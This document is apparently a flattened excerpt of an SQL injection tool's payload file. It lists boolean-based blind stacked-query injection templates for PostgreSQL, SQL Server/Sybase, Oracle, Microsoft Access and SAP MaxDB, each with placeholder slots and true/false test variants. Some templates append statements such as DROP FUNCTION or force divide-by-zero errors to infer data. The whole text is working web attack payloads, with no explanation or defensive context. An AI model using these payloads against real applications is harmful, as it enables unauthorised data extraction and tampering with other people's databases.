PostgreSQL boolean-based blind - Stacked queries (GENERATE_SERIES) 1 5 1 1-8 1 ;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1 ;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1 -- ;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1
PostgreSQL
Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF) 1 3 1 1-8 1 ;IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR] ;IF([RANDNUM]=[RANDNUM]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR] -- ;IF([RANDNUM]=[RANDNUM1]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]
Microsoft SQL Server Sybase
Microsoft SQL Server/Sybase boolean-based blind - Stacked queries 1 4 1 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END) ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END) -- ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)
Microsoft SQL Server Sybase
Oracle boolean-based blind - Stacked queries 1 4 1 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL -- ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL
Oracle
Microsoft Access boolean-based blind - Stacked queries 1 5 1 1-8 1 ;IIF([INFERENCE],1,1/0) ;IIF([RANDNUM]=[RANDNUM],1,1/0) %16 ;IIF([RANDNUM]=[RANDNUM1],1,1/0)
Microsoft Access
SAP MaxDB boolean-based blind - Stacked queries 1 5 1 1-8 1 ;SELECT CASE WHEN [INFERENCE] THEN 1 ELSE NULL END ;SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE NULL END -- ;SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE NULL END
SAP MaxDB